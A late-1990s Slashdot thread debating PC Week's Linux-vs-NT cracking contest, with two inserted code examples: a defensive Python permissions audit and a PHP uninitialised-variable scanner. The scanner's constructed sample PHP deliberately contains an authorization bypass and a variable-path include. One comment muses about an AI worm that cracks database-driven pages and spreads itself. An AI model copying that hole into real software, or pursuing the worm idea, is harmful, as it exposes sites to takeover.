      I'm sure "SlashdotMedia" will improve on all the wonders that Dice Holdings blessed us all with
    3. Re:Sour Grapes - linux lost by witz · · Score: 1

      Part of this is due to the fact that MS doesn't redistribute NT on a 6 month, year or biyearly basis. Which Linux does. It's much easier to keep it current that way, don't you think? So administrators have to keep the latest service pack CD on hand...woopty doo. Real tough.

    4. Re:Sour Grapes - linux lost by Cramer · · Score: 2

      "linux" is the kernel; Redhat, Debian, Slackware, SLS (*grin*), SuSe, etc. are OSen.

      NT "out of the box" (read: straight off the CD) is far more problematic than most Linux distributions "out of the box". How many service packs and/or hotfixes are required to keep NT 4.0 from walking off a cliff? [Redhat is a bad example, but I'll use it anyway.] How many updates are required to keep Redhat 4.2 from jogging into on-coming traffic? In both cases, you will need to turn a few things on or off depending on what you selected during installation. (And in the NT 4.0 case, you need to install the 70M IE4 to get it near usable -- it shipped with IE3 which cannot be used to access even Microsoft's download section(s). I find that damned annoying.)

      Kernel to Kernel, linux and NT are too close to call. Just look at how often kernel related defects for both systems turn up. Which is more secure? Neither. Both systems can be compromised -- it's generally easier on a linux system due to the ease of (nearly) replicating the system and the availability of code to thumb through. (It's hard to break into a black-box.)

      Given a choice, I'll take any UNIX over Windows. I like having a command line; I hate having magic hidden behind GUI buttons; and I _like_ being able to "telnet" into my UNIX server that has no video device at all.

      "I don't care if a pair of gerbils could break into it; I'm gonna use linux."

  122. OS security? by gklyber · · Score: 1

    An OS is only as secure as the software run on it. These security tests don't really test the OS because the OS needs software to provide services.

    In this test, Linux lost. It may have been a poor choice of software, but it lost. NT tends to implement more functionality under the main OS while Linux relies more on other programs.

    The Linux OS may be very secure, but it can't do much by itself. NT tends to be more consistent as MS dictates more over functionality that Linux would rely on others to provide.

    Relating these tests to the OS is silly. I could run a good or bad web server on either platform.

    1. Re:OS security? by Anonymous Coward · · Score: 0

      I agree that an "OS is only as secure as the software run on it." However, it IS a test of the OS security. As much as I love Linux, the reality is that Unix in general leaves holes for daemons and the like to execute as they should.

      If I can use an application (daemon or otherwise) to crack security on a system, the OS has left holes for me to do it. I've cracked ITS security.

      This doesn't mean every implementation and configuration combination is really, really insecure. The kernel's security holes can be mostly plugged if you have the time and resources.

  123. Hacking CGI is fair by substrate · · Score: 5

    Not only is it fair but maybe it's important to note. Too many people, including security authorities within many companies, fail to recognize how rigorous you have to be to maintain security. You can apply every patch against every line of code on your system and still be insecure. What's worse is that because so many people rely on specialized tools, such as SATAN, to audit security they become trusting and complacent. They're a good first step but they shouldn't be the only step for mission critical equipment.

    Suppose the white hat community is fully caught up with the black hat community, or maybe even a few steps ahead. Any standard script attacks against the infrastructure of your network will fail but there's still a glaring problem.

    What about user software? Users like to run software. Some of the software interacts over the internet at large, such as games. Most of it is not designed by people overly concerned with security. People run poorly written CGI scripts. All of this provides the ability to get into whatever account the application was running from. Smart intruders will remain very quiet (dumb ones will post things like "Y3R 0WN3D") and bide their time. Eventually with enough patience and/or intelligence the system can be compromised further.

    There's a lot of things that are secured dumbly. People are smart enough not to run web servers as root anymore. They run them as 'nobody', which is fine, but they leave 'nobody' with a valid shell which is dumb.

    The only truly secure system is one that is turned off, encased in concrete and sunk in the deepest trenches in the ocean. Unfortunately that isn't terribly useful, but you can increase security by conducting 'what if' thought experiments.

    1. Re:Hacking CGI is fair by datarealm · · Score: 2
      Without question hacking CGI is fair. In fact, two really big and very recent CGI blunders come to mind:

      • hotmail
      • network solution's dotcom mail

      In neither instance were there any server breaches (that have been disclosed) but some really stupid CGI errors made the entire systems as they were intended to run wide open and completely vulnerable.

      If this contest was meant to only test the OS, it should have been spelled out as such in the rules.
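
Added example (not part of any comment in this thread, and not PC Week's configuration): comments 107 and 123 name two things an administrator can check mechanically, namely whether anything under the document root or cgi-bin is setuid, world-writable or writable by the account the web server runs as, and whether that account still has a login shell. The Python sketch below does both; the passwd sample, uid 99 and all function names are constructed for illustration.

```python
import os
import stat
import sys

# Constructed sample in /etc/passwd format (not taken from the contest machine).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
nobody:x:99:99:Nobody:/:/bin/sh
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
"""

# Shells that refuse an interactive login.
NON_LOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin",
                    "/bin/false", "/usr/bin/false"}


def classify(mode, owner_uid, server_uid):
    """Return the problems for one path, given its st_mode and owner uid.

    Group-write access is not evaluated here; that would need the
    server account's group memberships as well.
    """
    problems = []
    if stat.S_ISLNK(mode):
        return problems  # a symlink's own mode bits are meaningless
    if stat.S_ISREG(mode) and mode & stat.S_ISUID:
        problems.append("setuid")  # e.g. a CGI installed 4755
    if stat.S_ISREG(mode) and mode & stat.S_ISGID:
        problems.append("setgid")
    # A sticky world-writable directory (like /tmp) is a deliberate setup.
    sticky_dir = stat.S_ISDIR(mode) and mode & stat.S_ISVTX
    if mode & stat.S_IWOTH and not sticky_dir:
        problems.append("world-writable")  # e.g. a page left at 666
    if owner_uid == server_uid and mode & stat.S_IWUSR:
        # Any code running as the server account can rewrite this path.
        problems.append("writable-by-server-account")
    return problems


def audit_tree(root, server_uid):
    """Walk root without following symlinks; map relative path -> problems."""
    findings = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        paths = [dirpath] + [os.path.join(dirpath, f) for f in filenames]
        for path in paths:
            st = os.lstat(path)
            problems = classify(st.st_mode, st.st_uid, server_uid)
            if problems:
                findings[os.path.relpath(path, root)] = problems
    return findings


def accounts_with_login_shell(passwd_text, accounts):
    """Return (name, shell) for each listed account whose shell allows login."""
    flagged = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue  # not a well-formed passwd entry
        name, shell = fields[0], fields[6]
        # An empty shell field means /bin/sh, so it is flagged too.
        if name in accounts and shell not in NON_LOGIN_SHELLS:
            flagged.append((name, shell))
    return flagged


if __name__ == "__main__":
    import pwd
    # Usage: script.py <document-root> <server-account>
    docroot, account = sys.argv[1], sys.argv[2]
    uid = pwd.getpwnam(account).pw_uid
    for path, problems in sorted(audit_tree(docroot, uid).items()):
        print(f"{path}: {', '.join(problems)}")
    with open("/etc/passwd") as fh:
        for name, shell in accounts_with_login_shell(fh.read(), {account}):
            print(f"{name} has login shell {shell or '(empty)'}")
```
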

  124. The NT site is just broken. by Anonymous Coward · · Score: 1

    This is probably the webmaster's and not the OS's fault, but when I try to click the "site diary" or the "site rules" I get..

    "netscape is unable to locate the server www.hackpcweek.com.com"

    very sloppy. should we take this test seriously if they are that sloppy about building sites?

    1. Re:The NT site is just broken. by laslo2 · · Score: 1

      www.hackpcweek.com.com?

      don't *think* so...

      --
      Karma only matters to me now and zen.
  125. Can you say "one-track mind"? by Pike · · Score: 5
    (Disclaimer: I like linux. I am trying to get it to work on my home box. This is not flame-bait, just devil's advocate material.)

    Just lurking in all the stories about linux vs NT security challenges, and it seems like most slashdotters are incredibly one-sided in their views, driven more by a sense of rebellion than anything else.

    When somebody challenges people to break into their linux box, somebody eventually does, and all kinds of excuses are offered.

    When somebody challenges people to break into their NT box, the linux sneetches with stars upon thars scoff, "Us? Condescend to help Microsoft by breaking into their pitiful OS? The very idea!"

    If linux is so secure and Windows anything is not:
    • Why do you refuse to prove your point by actually cracking an NT box in one of these challenges? On a related note, I have heard as an excuse for Linux in response to the ZDnet trial, "A system is only as good as its administrator." This seems true, but if you really believed it, (A) you would know that you would not be helping MS by cracking NT, you would be helping only the particular person administrating that box, and (B) you would be proving your as-yet undemonstrated point that NT is at least as insecure as Linux.
    • Why do I read, in every mailing list and newsgroup, posts from Linux people saying "HELP! Someone cracked my box! What do I DO??" These would seem to back up my first point.
    • Why is network security so complicated in Linux as compared to Windows? My windows computer is connected 24x7 via aDSL, all I have to do is disable file/print sharing; one check box. If I enable sharing, I just have to use common sense and set a password. If you wanted Linux to be more secure, you could try making it easier to batten down the hatches.

    If linux advocates want any credibility, they will have to stop giving knee-jerk, "heads-I-win tails-you-lose" excuses and begin to demonstrate their claims.

    Joel Dueck
    1. Re:Can you say "one-track mind"? by bradipo · · Score: 2

      Your Windows computer connected 24/7 via DSL doesn't run any services so you may leave that point out. Like you say, if you disable file and print services, you don't run any risks, but you lose the functionality for that particular moment which if you need it does you no good anyway. The same can be done with a linux box. Disable all the services and no one can get in, but therein you will have a pretty useless server. You are comparing apples and oranges here.

    2. Re:Can you say "one-track mind"? by dammitjim · · Score: 2

      You're right about some people's attitudes - linux should win or lose any comparison on its merits, not because people want it to win or because they want the other platform to lose. We here at /. should take care not to let this forum degenerate into Mac vs. Windows.

      Play with linux for a bit, though, and you'll see why people sometimes have trouble securing their machines. There are a ton of options available, and network security is not easy - especially when the sharks out there keep getting more creative.

      After shelling out for NT, you need to spend even more money to enable network services besides file sharing, so people who don't need that software don't have it. With linux, it's all there, right after install. So, because nobody has released a distro just for newbies, most people's boxes come up running telnetd and sendmail and all the potentially weak links in a large, complex system.

      In short, the strengths of linux can also become its weaknesses, and we as a user community should see what we can do to remedy that.

    3. Re:Can you say "one-track mind"? by El+Volio · · Score: 5

      You're right. It serves no purpose to ignore one box. But at the same time, for both Linux and WinNT, the statement regarding the administrator holds true. What you want is to get an absolute NT security guru to configure one box, and a UNIX/Linux security guru for the other, hopefully equalizing that portion of the test.

      It's more common for Linux users to notice the box has been cracked. Windows users who suffer BO and similar attacks may not realize that it was due to a network intrusion, and just chalk it up to the notorious unreliability of Windows. Additionally, the type of users who are "experimenting" with Linux are more likely to be interested in security (and doing things that could risk their machines!) than the average Windows user who just wants to surf the Web.

      You should not believe that merely un-checking file&print sharing will secure a Windows machine. While the rules of the contest don't count DoS attacks (since that's not the purpose of this particular evaluation), for actual consideration that would have to be a factor. Additionally, remember that this isn't just putting a Win9x or even a WinNT-WS box on the net -- it's a web server, which comes with a whole different set of challenges. With more power comes more complexity. This is true of programming, networking, race car driving, and most things in life.

      I agree with you: this should not be viewed as an "either/or" proposition, but as an ongoing process. That's the way the world works, and any test should try to reflect reality in a controlled way. IOW, control is just to take out variances by converting a variable into a constant.

      --

      "You can never have too many elephants on your team."

    4. Re:Can you say "one-track mind"? by jelwell · · Score: 5

      I think a lot of people are missing the point of open sourced security. The guy who cracked the Linux Box pointed out that the security issue was a closed-source cgi script. Everyone needs to remember that the difference that the Free Software Foundation purports between NT and Linux is that Linux - with an open sourced system security can be proven; whereas in a closed source environment security can only be hoped for.

      I don't condone the way this "hack contest" was put together. But I also don't think the results should be invalidated. Someone earlier mentioned that "Us? Condescend to help Microsoft by breaking into their pitiful OS? The very idea!" - the author seems to think Linux users should all try to work collectively to hack into the NT box. Is it really that Linux users think themselves better than Microsoft? Or is it really that Linux users are overly educated in the security realms of their own world? While NT security administrators can only hope that Microsoft has protected them - without really knowing how they might be exploited - and how they might secure themselves other than just applying NT updates.

      Just remember: Open source security allows the administrator to have as much control over their security as any hacker - script kiddie or otherwise. Closed Source security means that thousands of MS employees, present and past, know more about your security and its holes than you do.
      Joseph Elwell.

    5. Re:Can you say "one-track mind"? by Eman · · Score: 1

      they can't simply type "w" and see who's logged in

      There is a program in windows that does allow you to see who is accessing your shared files. I forgot the name of it, but it comes with windows (although I am not sure that it is installed by default).

      --
      Eric Anderson
    6. Re:Can you say "one-track mind"? by eries · · Score: 2

      you're right on, but I think there's more to it than that. One of the big consequences of OSS is that it eliminates "security through obscurity." In general, we all agree that this is a Good Thing (tm) because in the long run it promotes the discovery of security holes that might otherwise lay dormant. However, this means that we are going to have to accept the fact that Linux will LOSE EVERY SINGLE CHALLENGE of this sort vs. NT. Why? because these challenges are fundamentally misguided. Finding bugs in NT is frustrating and hard, because most people don't have the source code. However, I'd much rather have lamerz trying script-based attacks on my machine than have some serious hacker able to reformat my hard drive because there has been a backdoor overrun exploit in Windows since 3.1 - that's ultimately worse, and these lame hacking contests miss the point.

      That said, I think it's important that we try as best we can to write apps that make it easier and easier to prevent the 3l33t d00dz from running script attacks against vanilla linux boxes run by newbie administrators who just switched from NT.

    7. Re:Can you say "one-track mind"? by banky · · Score: 2

      Maybe I am atypical. When someone hacked my box, I was lucky enough to be there and yank the power cord out of the router before they managed to do anything but add a user and start downloading a trojan-ed bash. I didn't go crying to the newsgroups, I looked at the syslog output and found out what the hole was, patched everything up, and restored everything. I triple-checked my Tripwire logs to make sure that nothing was disturbed, grabbed the backup tapes and archive CDROMs I burn every 3 months, and spent several hours without it being online. I rigorously checked, rechecked, and patched, and then put it back up. They started banging away not 30 minutes later, and have been banging on every hole that comes through BUGTRAQ and everywhere else. Now I stop all work to patch a hole (rather than doing it after hours, even if I have to tell everyone to stop what they are doing - and yes, they still complain, but I don't listen). These things may seem like a lot of trouble but then again, so was the last time I patched an NT box - which broke lots of software, I might add. Merely un-checking a box won't make you secure to anything but that attack, BTW. If you run a web server, or use ICQ, or any other host of problems, not to mention DoS attacks which aren't patched in Windows, you are open. Kindly give me your IP address and I will demonstrate. Not to mention that Linux is a "one stop shop" for network services and NT is basically shipped without too many useful services IMHO. As to why not crack the NT box, well think about it: if I logged thousands of hours living and breathing Linux, and dozens with NT, I am going to get into the Linux box. Bottom line. If I am a car thief that likes Corvettes, I am not going to steal the Mustang unless there is nothing else around to steal. And as far as helping MS: I think it's a lame argument, personally.
      But given that they don't go to any lengths to replicate a real-world environment (NT is the most superior OS ever in Marketing Land!). Why go through all the effort to try when everything that works in the real world won't work at all? Then they proudly display their logs, show the failed attacks, and say "Look, no one could get in!".

      --
      ZOMG I WOULD LOVE TO KNOW ABOUT YOUR FEELINGS ON MACINTOSH VERSUS WINDOWS, VI VERSUS EMACS, AND HOW YOU'RE NOT A DORK
    8. Re:Can you say "one-track mind"? by tgd · · Score: 5



      Why do you refuse to prove your point by actually cracking an NT box in one of these challenges? On a related note, I have heard
      as an excuse for Linux in response to the ZDnet trial, "A system is only as good as its administrator." This seems true, but if you
      really believed it, (A) you would know that you would not be helping MS by cracking NT, you would be helping only the particular
      person administrating that box, and (B) you would be proving your as-yet undemonstrated point that NT is at least as insecure as
      Linux.


      Part of the thing that people sometimes miss is the higher number of underqualified administrators administrating NT servers than Unix servers. With the meteoric rise of Linux, that's becoming less the case. These days any joe-blow can throw redhat on a machine in ten minutes and leave it at that. A few years ago it wasn't that easy.

      It's also probably worth pointing out that on the net, there's more usefulness that comes to a cracker in cracking a Unix system than an NT because of its inherent multiuser ability, and the fact that many things can be easily configured through text files. That makes them a prime target for script-kiddies, both because they're easier to reconfigure in a small amount of code, and because of the fact that actually getting into the server is more useful. Therefore, there's a lot more exploit scripts it seems for Unix than for NT. I don't think that's because of any lack of security holes in NT, but rather a lack of reasons to bother hacking an NT machine beyond pointing out to the administrators that NT is a bad solution.

      Why do I read, in every mailing list and newsgroup, posts from Linux people saying "HELP! Someone cracked my box! What do I
      DO??" These would seem to back up my first point.


      For the same reason as I said above, as well as the fact that most Windows users probably wouldn't notice the fact that they'd been cracked. They can't simply type "w" and see who's logged in, and they're more used to seeing their computer slowing down and having the drives running for god-knows-what-reason. Last time I was using a cable modem, there were several dozen machines that would've been rather easy to get into because they had their drive shared without a password. Short of deleting all the files, how would anyone possibly know I was in their stuff? They wouldn't. And even if I deleted any of their files, without the logging present like there is under Unix, they wouldn't be able to figure out that it was an external user that wiped the files, and not some weird glitch in the system.

      Why is network security so complicated in Linux as compared to Windows? My windows computer is connected 24x7 via aDSL,
      all I have to do is disable file/print sharing; one check box. If I enable sharing, I just have to use common sense and set a
      password. If you wanted Linux to be more secure, you could try making it easier to batten down the hatches.


      It's more complicated because you're running a server OS. That's been discussed to death -- the fact that there aren't (yet) any good "desktop" distributions, that won't by default install all the services that aren't actually used. Linux is easy to tighten up, but you've got to know that you need to do it, and you've got to know that the desktop system you installed has as much capability as any "server". A lot of people don't know that, and don't understand what that entails.

      I'm hoping to find out that Corel's distribution ends up a "client only" distribution... that'd go a long way towards making that distinction clear.

    9. Re:Can you say "one-track mind"? by Admiral+Burrito · · Score: 2
      Just lurking in all the stories about linux vs NT security challenges, and it seems like most slashdotters are incredibly one-sided in their views, driven more by a sense of rebellion than anything else.

      Yes, and the Micro$ofties are equally one-sided. Anyone truly impartial probably doesn't care enough one way or the other to state an opinion.

      When somebody challenges people to break into their linux box, somebody eventually does, and all kinds of excuses are offered.

      I think the Linux PPC box is still running unhacked.

      When somebody challenges people to break into their NT box, the linux sneetches with stars upon thars scoff, "Us? Condescend to help Microsoft by breaking into their pitiful OS? The very idea!"

      Agreed, that seems to me to be a cop out. I think the Unix advocates know too little about NT to actually make an attempt. I think the reverse is probably true as well, the NT advocates don't know enough about Unix, which is why they have these "hacking contests" (which seem to be mostly promoted by Windows people) to get the Unix folks to do the Unix cracking for them.

      Really, I think the main reason Unix gets more attention from hackers than NT is because Unix is just more interesting to hack. There have been decades of real-world experience to understand the security issues associated with Unix. And once you're in, you actually have a rich remotely-accessible environment to play in.

      NT on the other hand is a different beast. Being a closed system and relatively new, the security issues are not nearly as well understood, even by NT "experts". And everyone seems to acknowledge that NT is not as good a system to access remotely, which makes a successful crack less fruitful.

      Ultimately I think it's more a security vs. obscurity thing. People don't hack NT not because it's unhackable, but because they just don't know how to hack it, and hacking it is ultimately uninteresting compared to hacking Unix. I wouldn't depend on this obscurity to protect anything of real value though.

      Why is network security so complicated in Linux as compared to Windows? My windows computer is connected 24x7 via aDSL, all I have to do is disable file/print sharing; one check box. If I enable sharing, I just have to use common sense and set a password.

      Don't forget to disable your web browser and your email software. Er, wait... Why are you connected to the internet? ;*)

      If you wanted Linux to be more secure, you could try making it easier to batten down the hatches.

      It's not that hard to disable services... Is it?

    10. Re:Can you say "one-track mind"? by golgotha007 · · Score: 1

      i disagree with you on your entire post. sure, people cry about their boxes being hacked, so let's re-enforce the saying, 'A system is only as good as its administrator'. these people crying are poor sysadmins.
      NT doesn't have the flexibility that linux and BSD has. NT doesn't give you the ability to tweak your security as tight as you possibly can.. with NT, your only option is to completely kill the offending service if no other security options are available.
      if you think your winblows machine is 'secure' by disabling the 'Share Files' box, then you're really misinformed (and then i ask myself, why am i wasting my time responding to this post in the first place?!?)

      good luck!!


      g o l g o t h a

    11. Re:Can you say "one-track mind"? by Stu_28 · · Score: 1

      Actually Joel, NT has been cracked in the real-world environment on more than one occasion. In fact, in a story posted on /. about security and the internet (this is the one about the security company scanning a large portion of the to find out just how insecure the internet really is) they noted that their own network (a security firm nonetheless) had been cracked into because of two NT machines (an employee's machine at home and one of their servers at work). Further, they noted that the NT log files were of no help figuring out how the person got in to the first NT box--they still don't know how it happened!

      To see what I'm talking about go here http://www.securityfocus.com/templates/forum_message.html?forum=2&head=32&id=32 and scroll down to the section with the header of "Third week" and read it for yourself.

    12. Re:Can you say "one-track mind"? by Hard_Code · · Score: 1

      netwatch

      it is copied over but not made known by putting it in the start menu.

      I think this is only for w9x. NT has how other set of utilities.

      --

      It's 10 PM. Do you know if you're un-American?
    13. Re:Can you say "one-track mind"? by blakestah · · Score: 1


      This was a marketing stunt.

      It says next to nothing about security
      of linux or NT except that if you set up
      your machine like a complete total moron
      you are likely to get cracked.

      The funniest thing about this stunt is that
      PCWeek has just badly eroded its credibility.

    14. Re:Can you say "one-track mind"? by Anonymous Coward · · Score: 0

      Just remember: Open source security only allows the administrator to have as much control over their security as any hacker. And, of course, requires the administrator to follow numerous newsgroups, apply patches, etc. etc.

      Job security for numerous vocal Slashdot participants, who certainly don't want more legal protection to cut into their nestegg. Viva online liberty, etc.

  126. In theory, yes, in ego, no! by nano-second · · Score: 3

    Well, yes, you're right. perfectly. That should be the point. Better operating systems... of course. Makes a lot of sense. But (and this is the kicker)...

    ... That is never going to be the point. CrackThis!(tm) challenges are always going to be about ego. The ego of the cracker. The ego of the OS community. Ego. It sounds childish and silly, but that's what it is. These contests, which seem to be common lately, are not about testing the system, really. Sure that is often a nice side effect, but really, it seems that it's more a way to "prove" that such-n-such OS is better than this-n-that OS.

    Sad, but true. It should be about improving the OS, but until these contests are restructured to be less inflammatory, people are going to use them as proof for their particular OS fanaticism. That's human nature and will have to be expected in such a setting.

    Now, I personally don't have anything against these contests, they do have useful results. But I don't think we can ever, realistically, expect them to be purely for improving the OS in question.
    ---

    --
    I hope you're not pretending to be evil while secretly being good. That would be dishonest.
  127. Linux box probably a mostly default config by Jeos · · Score: 3
    Someone in the forum on the hackpcweek page was arguing that Microsoft had configured the NT server, but the linux one was mostly default. I think this probably was the case, when poking around the linux server I noticed that the Apache default dirs manual and icons were still on the server with all the default files in them. While this doesn't really cause any security problems, it lends toward the idea that the Linux/Apache install was mostly default and not configured very well. Since they used a mostly default install they probably also just grabbed an off the shelf cgi script, which is more important because it led to the crack. Also when the contest first started the Linux guestbook script wasn't even filtering out HTML and javascript, but the NT script was. Which once again points to carelessness with setting up the Linux box.

    But regardless of if they were careless or not, that's really a non-issue, the issue is that cgi script was at fault. I'm sure that if this script was running on the NT server, it could also have been cracked.

  128. Re:Test BOGUS. Linux is UNHACKABLE. PERIOD. by Wah · · Score: 1

    Therefore you must be a Microsoft user sent to make linux users look bad :)
    nope, just a troll looking for food. Now he's got some more. Don't Feed the Trolls.

    --
    +&x
  129. I'm getting a bit sick of this... by xENTROPYx · · Score: 0

    Alright, everyone... I'm not sure about the rest of you, but I'm getting UNBELIEVABLY sick of these 'security tests'. The platforms that they test are almost never equal, and obviously most of the administrators have no idea what security is. I'm fairly certain that if you put an NT box up against a Linux box, found the top administrators for their respective platforms, and let them configure the boxes THEMSELVES (although requiring some services to be turned on (ftp, telnet, etc.) to simulate a 'real' environment.) that both systems would be damn nigh impenetrable. Of course, at that point the only real test would be of the administrator's skills, as patches are available for both systems for all of their myriad security holes... (Of course, this says nothing about NT going down of its OWN accord... hehe)

    To paraphrase, a system is only as secure as its administrator is skilled.

  130. Dan Attenborough by DrMaurer · · Score: 5

    Fact is, we all know that Linux can squish NT flat. Let's set up a test that proves that.
    See the linux user in his native habitat, he's tensed, poised, awake, and banging at his keyboard in anger that someone may have cracked his sacred linux, even if it was a cheap shot. He's letting his real skin show, and it's as ugly as the linux command prompt or the blue screen of death. He wants to set up a test that proves that linux is better. The linux user is unaware that such a test is stupid and proves nothing.
    This is an interesting specimen, of course. But the average Linux or NT zealot would all speak the same way. "They know they are the best, so let's set up a test that proves it." It shows everyone that the truth is hard to deal with no matter which side of the fence you are on. They don't want security, they want their way.
    Oh no! Here comes Demons and TAO, "the ultimate OS" representatives! Amiga and BE! OH! The humanity, they're squabbling for leftovers! Oh, the elephant of NT is here, trying to trample them all! Penguins are being smashed by the dozens, more and more are pecking furiously at the elephant. It's getting too much for the pachyderm, it slumps down and dies. The demon rips off the trunk of the dead evil NT elephant, and the penguins keep pecking and squawking, sure of their superiority.
    Is that movement in the bush? Oh, indeed it is! I can't quite make it out, but it's grabbing everything and eating them alive! Oh! The humanity!
    They never saw what hit them. They were just standing there, all quacking and whatever else they might do, and something ate them all! Oh, my Lord! What predator can do such a thing? Obviously it must be higher on the evolutionary ladder!
    We had best get out while we can!
    Signing off, and remember, don't ever stand still and gloat and assume you're safe, or you'll get eaten.

    --
    Dan
    1. Re:Dan Attenborough by quux26 · · Score: 2

      See the linux user in his native habitat, he's tensed, poised, awake, and banging at his keyboard in anger that someone may have cracked his sacred linux, even if it was a cheap shot. He's letting his real skin show, and it's as ugly as the linux command prompt or the blue screen of death. He wants to set up a test that proves that linux is better.

      Like an NT user, of course I have my preference and biases. I also believe that Linux is not only a better security platform, but philosophically as well. I'd use it even if it was shown to be less secure. But it doesn't matter what I believe to be true, does it? It must be tested.

      I think that the layout of the challenge was poorly stated, but this is merely Monday-morning quarterbacking at its worst.

      Again, if it was NT that was brought to its knees, nobody would be uttering ANYTHING about "second chances", and that bugs me a bit. But do I have some sort of inbred, insatiable desire to make sure Linux wins at all costs? Hell no. I am a scientist to the core, and the truth can always be questioned. I hope Linux comes out on top ...I sincerely believe that it will ...but it's my responsibility to be open to an alternate outcome.

      My .02
      Quux
      http://www.intap.net/~j/

      --

      My .02
      Quux26
      www.crashspace.net
  131. Yum.. CGI script hack.. by Weezul · · Score: 1

    It's kinda funny.. the OS is frequently like one of the most secure links in the chain on either Linux or NT. It's often the custom software which is vulnerable.. PHP's default behavior for example is to place all form variables into the global name space. Not a big deal to fix since you can always initialize a variable before you use it if it should not be coming from a form, but it is dangerous.. I seem to recall VBScript having related problems.. and I could be wrong about this, but I believe it was a pain in the ass to even SQL safe form vars in VBScript. Just think of how many credit card taking pages out there are in VBScript.

    Now, people worry more about OS/daemon hacks since then script kiddies can use them, but the serious cracker who really wants to fiddle with your data driven site can do wonders.. What would be especially cool is to see an AI that could crack database driven VBScript pages by guessing probable programmer mistakes.. and say propagate itself as an ActiveX control into the pages. Now, that would be beautiful since there wouldn't really be crap MS could do about this little worm.. it's the developer's fault.. never mind that MS didn't give them the tools to try and prevent it.

    Anywho, the point being.. we should expect more serious exploits of this form in the future.

    Jeff

    BTW> It would be kinda cool to write a PHP script analysis program which looked for security holes.

    --
    The Christian religion has been and still is the principal enemy of moral progress in the world. -- Bertrand Russell
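The two points in Weezul's comment above (form variables landing in PHP's global namespace unless the script initialises them first, and the wish for a tool that scans PHP for such holes) can be sketched as a small checker. This is an added example, not part of the original thread or of any project's code; the function names, the sample script and its `check_password` helper are constructed, and treating only a plain `$var =` in a still-open block as initialisation is a deliberately conservative assumption (it will also report function parameters and `foreach` variables).

```python
import re

# Names PHP itself populates; reading them is never "uninitialised".
PREDEFINED = {"_GET", "_POST", "_COOKIE", "_SERVER", "_FILES", "_ENV",
              "_REQUEST", "_SESSION", "GLOBALS", "this"}

_SKIP = re.compile(
    r'"(?:\\.|[^"\\])*"'             # double-quoted string (interpolates)
    r"|'(?:\\.|[^'\\])*'"            # single-quoted string (does not)
    r"|/\*.*?\*/|//[^\n]*|#[^\n]*",  # comments
    re.S)
_TOKEN = re.compile(r"[{};]|\$([A-Za-z_]\w*)")
_ASSIGN = re.compile(r"\s*=(?![=>])")   # "=" but not "==" or "=>"


def _blank(match):
    """Drop comments and strings, keeping line numbers intact."""
    text = match.group(0)
    kept = ""
    if text.startswith('"'):
        # Variables inside double quotes are read at run time: keep them.
        kept = " ".join(re.findall(r"(?<!\\)\$[A-Za-z_]\w*", text))
    return kept + "\n" * text.count("\n")


def find_uninitialised(php_source):
    """Return sorted (line, name) pairs for variables that are read before
    any plain assignment in an enclosing, still-open block. With form
    variables registered as globals, each one can be preset by the client."""
    code = _SKIP.sub(_blank, php_source)
    scopes = [set()]   # one set of initialised names per open { } block
    pending = set()    # assigned in this statement, usable after ";" or "{"
    findings = {}
    for m in _TOKEN.finditer(code):
        tok = m.group(0)
        if tok in ("{", ";", "}"):
            scopes[-1] |= pending
            pending = set()
            if tok == "{":
                scopes.append(set())
            elif tok == "}" and len(scopes) > 1:
                scopes.pop()        # assignments made inside the block may
                                    # not have run, so forget them
            continue
        name = m.group(1)
        if name in PREDEFINED:
            continue
        if _ASSIGN.match(code, m.end()):
            pending.add(name)
        elif name not in findings and not any(name in s for s in scopes):
            findings[name] = code.count("\n", 0, m.start()) + 1
    return sorted((line, name) for name, line in findings.items())


# Constructed sample script: the admin check trusts a variable that is
# only assigned on the success path.
SAMPLE = r'''<?php
// Constructed sample: admin check that trusts an unset variable.
if (check_password($_POST['user'], $_POST['pw'])) {
    $authorized = 1;            # only set on the success path
}
$title = 'Admin for $site';     // single quotes: no interpolation
$log = "login attempt by $who";
if ($authorized) {
    include "$module/admin.php";
}
'''

if __name__ == "__main__":
    for line, name in find_uninitialised(SAMPLE):
        print(f"line {line}: ${name} is read before it is initialised")
```

Adding `$authorized = 0;` at the top of the sample, the fix the comment describes, removes that finding.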
    1. Re:Yum.. CGI script hack.. by Pike · · Score: 1

      "Just think of how many credit card taking pages out there are in VBScript."

      Very few. Most use java script if any, since Netscape doesn't do vbscript. Unless you mean ASP, which is all server-side anyway and very transient.

  132. Sounds like a valid result to me by Gavin+Scott · · Score: 4

    "and this is obviously not an OS test."

    If you take 100 users and tell them to set up a challenge like this, and in more cases the Linux box ends up getting cracked and the NT box does not, then Linux "system" is clearly less secure, regardless of whether it is the Kernel, a subsystem, an add-on package, the documentation, the ease of use, or the user's own idiocy that results in the break.

    These days systems like Linux and NT are so absurdly complex that you can't talk about the
    security of "the operating system" in isolation.

    And before you label me a MS troll, let me say that I think both NT and Linux are really lousy operating systems. They are like the left and right extremes of the political spectrum. On one hand you have the totalitarian Microsoft OS ("You *will* use it the way we tell you to") and on the other you have Linux (i.e. Unix) where everyone can have everything any way that they like, and as a result nobody can agree on what the functionality should be for any component that's higher up the evolutionary ladder than a Lego Brick.

    Unfortunately most of you reading this will have grown up knowing only these two extremes, and probably have never seen an operating system that is really there to help you get the job done quickly and efficiently. Unfortunately most of these elegant and effective OS products have all but died out today because of all the foaming, heat-seeking, lusers drooling over the latest trend they read in Computerworld.

    One day there *will* come a Great Operating System(tm), but it's not going to be Windows (and Microsoft probably won't write it), and it isn't going to be Linux, and it isn't BeOS, and it isn't MacOS, or any of the other current options, so as you wipe the spittle from your mouth after your latest /. Linux/NT flamewar, pause and reflect for a moment that maybe there might possibly be a better way...

    G.

    1. Re:Sounds like a valid result to me by fat_mike · · Score: 1

      Damn, I really miss my Tandy Color Computer and TI/94a. Now there were a couple of secure systems. :)

    2. Re:Sounds like a valid result to me by Anonymous Coward · · Score: 0

      I agree with Gavin. All this computer stuff going on around us...all of us who make our livings with computers...Let's all just drop them until something better comes along. But if *we* all drop it...how the hell is something better ever going to come along?

    3. Re:Sounds like a valid result to me by beme · · Score: 1

      Isn't there always a better way? Doesn't mean we should just drop everything and wait for it to come along...or was that not what you were getting at?

      --

      -beme
      1971
  133. Was it really a surprise? by richj · · Score: 1

    I pretty much expected from the get-go that Linux
    was going to come out in a negative light. I'm not surprised in the least.

